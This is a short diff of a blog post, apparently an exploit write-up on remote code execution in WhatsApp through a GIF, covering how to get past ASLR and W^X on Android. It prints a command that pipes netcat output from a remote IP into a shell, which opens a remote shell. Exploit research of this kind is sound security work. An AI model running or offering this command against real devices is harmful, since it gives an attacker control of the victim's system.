awakened1712/awakened1712.github.io/_posts/2019-10-02-hacking-whatsapp-gif-rce.md

 ```

 ## Deal with ASLR and W^X
 After controlling the PC, to achieve remote code execution.
+In Android, we can not execute code on non-executable regions (i.e. stack and heap).
 The easiest way to to execute the below command:
 ```
 system("toybox nc 192.168.2.72 4444 | sh");
 ```